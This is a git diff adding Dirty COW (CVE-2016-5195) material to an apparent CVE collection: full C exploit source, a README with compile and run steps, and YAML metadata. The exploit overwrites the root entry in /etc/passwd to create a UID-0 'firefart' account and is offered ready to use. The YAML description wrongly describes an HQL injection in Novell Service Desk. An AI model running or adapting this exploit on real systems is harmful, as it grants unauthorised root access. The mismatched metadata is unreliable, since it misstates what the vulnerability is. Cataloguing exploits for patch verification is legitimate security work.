diff --git a/cve/linux-kernel/2016/CVE-2016-5195/CVE-2016-5195.c b/cve/linux-kernel/2016/CVE-2016-5195/CVE-2016-5195.c new file mode 100644 index 0000000000000000000000000000000000000000..cdb51673e64d8b8930c3ee6b887605f2d880ee90 --- /dev/null +++ b/cve/linux-kernel/2016/CVE-2016-5195/CVE-2016-5195.c @@ -0,0 +1,193 @@ +// +// This exploit uses the pokemon exploit of the dirtycow vulnerability +// as a base and automatically generates a new passwd line. +// The user will be prompted for the new password when the binary is run. +// The original /etc/passwd file is then backed up to /tmp/passwd.bak +// and overwrites the root account with the generated line. +// After running the exploit you should be able to login with the newly +// created user. +// +// To use this exploit modify the user values according to your needs. +// The default is "firefart". +// +// Original exploit (dirtycow's ptrace_pokedata "pokemon" method): +// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c +// +// Compile with: +// gcc -pthread dirty.c -o dirty -lcrypt +// +// Then run the newly create binary by either doing: +// "./dirty" or "./dirty my-new-password" +// +// Afterwards, you can either "su firefart" or "ssh firefart@..." +// +// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! +// mv /tmp/passwd.bak /etc/passwd +// +// Exploit adopted by Christian "FireFart" Mehlmauer +// https://firefart.at +// + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +const char *filename = "/etc/passwd"; +const char *backup_filename = "/tmp/passwd.bak"; +const char *salt = "firefart"; + +int f; +void *map; +pid_t pid; +pthread_t pth; +struct stat st; + +struct Userinfo { + char *username; + char *hash; + int user_id; + int group_id; + char *info; + char *home_dir; + char *shell; +}; + +char *generate_password_hash(char *plaintext_pw) { + return crypt(plaintext_pw, salt); +} + +char *generate_passwd_line(struct Userinfo u) { + const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; + int size = snprintf(NULL, 0, format, u.username, u.hash, + u.user_id, u.group_id, u.info, u.home_dir, u.shell); + char *ret = malloc(size + 1); + sprintf(ret, format, u.username, u.hash, u.user_id, + u.group_id, u.info, u.home_dir, u.shell); + return ret; +} + +void *madviseThread(void *arg) { + int i, c = 0; + for(i = 0; i < 200000000; i++) { + c += madvise(map, 100, MADV_DONTNEED); + } + printf("madvise %d\n\n", c); +} + +int copy_file(const char *from, const char *to) { + // check if target file already exists + if(access(to, F_OK) != -1) { + printf("File %s already exists! Please delete it and run again\n", + to); + return -1; + } + + char ch; + FILE *source, *target; + + source = fopen(from, "r"); + if(source == NULL) { + return -1; + } + target = fopen(to, "w"); + if(target == NULL) { + fclose(source); + return -1; + } + + while((ch = fgetc(source)) != EOF) { + fputc(ch, target); + } + + printf("%s successfully backed up to %s\n", + from, to); + + fclose(source); + fclose(target); + + return 0; +} + +int main(int argc, char *argv[]) +{ + // backup file + int ret = copy_file(filename, backup_filename); + if (ret != 0) { + exit(ret); + } + + struct Userinfo user; + // set values, change as needed + user.username = "firefart"; + user.user_id = 0; + user.group_id = 0; + user.info = "pwned"; + user.home_dir = "/root"; + user.shell = "/bin/bash"; + + char *plaintext_pw; + + if (argc >= 2) { + plaintext_pw = argv[1]; + printf("Please enter the new password: %s\n", plaintext_pw); + } else { + plaintext_pw = getpass("Please enter the new password: "); + } + + user.hash = generate_password_hash(plaintext_pw); + char *complete_passwd_line = generate_passwd_line(user); + printf("Complete line:\n%s\n", complete_passwd_line); + + f = open(filename, O_RDONLY); + fstat(f, &st); + map = mmap(NULL, + st.st_size + sizeof(long), + PROT_READ, + MAP_PRIVATE, + f, + 0); + printf("mmap: %lx\n",(unsigned long)map); + pid = fork(); + if(pid) { + waitpid(pid, NULL, 0); + int u, i, o, c = 0; + int l=strlen(complete_passwd_line); + for(i = 0; i < 10000/l; i++) { + for(o = 0; o < l; o++) { + for(u = 0; u < 10000; u++) { + c += ptrace(PTRACE_POKETEXT, + pid, + map + o, + *((long*)(complete_passwd_line + o))); + } + } + } + printf("ptrace %d\n",c); + } + else { + pthread_create(&pth, + NULL, + madviseThread, + NULL); + ptrace(PTRACE_TRACEME); + kill(getpid(), SIGSTOP); + pthread_join(pth,NULL); + } + + printf("Done! Check %s to see if the new user was created.\n", filename); + printf("You can log in with the username '%s' and the password '%s'.\n\n", + user.username, plaintext_pw); + printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n", + backup_filename, filename); + return 0; +} \ No newline at end of file diff --git a/cve/linux-kernel/2016/CVE-2016-5195/README.md b/cve/linux-kernel/2016/CVE-2016-5195/README.md new file mode 100644 index 0000000000000000000000000000000000000000..cfc3383c75d6363b20f0d22239ba5e8938082aa6 --- /dev/null +++ b/cve/linux-kernel/2016/CVE-2016-5195/README.md @@ -0,0 +1,26 @@ +dirtycow +This exploit uses the pokemon exploit of the dirtycow vulnerability as a base and automatically generates a new passwd line. The user will be prompted for the new password when the binary is run. The original /etc/passwd file is then backed up to /tmp/passwd.bak and overwrites the root account with the generated line. After running the exploit you should be able to login with the newly created user. + +To use this exploit modify the user values according to your needs. + +The default user being created is firefart. + +Original exploit (dirtycow's ptrace_pokedata "pokemon" method): https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c + +Compile with: + +gcc -pthread dirty.c -o dirty -lcrypt +Then run the newly create binary by either doing: + +./dirty +or + + ./dirty my-new-password +Afterwards, you can either su firefart or ssh firefart@... + +DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! + +mv /tmp/passwd.bak /etc/passwd +Exploit adopted by Christian "FireFart" Mehlmauer + +https://firefart.at \ No newline at end of file diff --git a/cve/linux-kernel/2016/yaml/CVE-2016-5195.yaml b/cve/linux-kernel/2016/yaml/CVE-2016-5195.yaml new file mode 100644 index 0000000000000000000000000000000000000000..efe2aaa148722a25cfa5181eed3148f2a57f4c5f --- /dev/null +++ b/cve/linux-kernel/2016/yaml/CVE-2016-5195.yaml @@ -0,0 +1,19 @@ +id: CVE-2016-5195 +source: https://github.com/firefart/dirtycow +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile in Micro Focus Novell Service Desk before 7.2 allows remote authenticated users to conduct Hibernate Query Language (HQL) injection attacks and obtain sensitive information via the entityName parameter. + scope-of-influence: + 2.x≤Linux Kernel<4.8.3 + reference: + - http://fortiguard.com/advisory/FG-IR-16-063 + - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2016-5195 + cwe-id: CWE-362 + cnvd-id: None + tags: 内核竞态条件 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index e8bb5774830a8e785297c84d795d749da3d7ac8f..1e4cf5d528179f060b03f90b73aafa22faa4f9b9 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -55,6 +55,7 @@ cve: - CVE-2022-2078 - CVE-2022-25265 - CVE-2022-41218 + - CVE-2016-5195 - CVE-2019-13272 - CVE-2020-12351 sudo: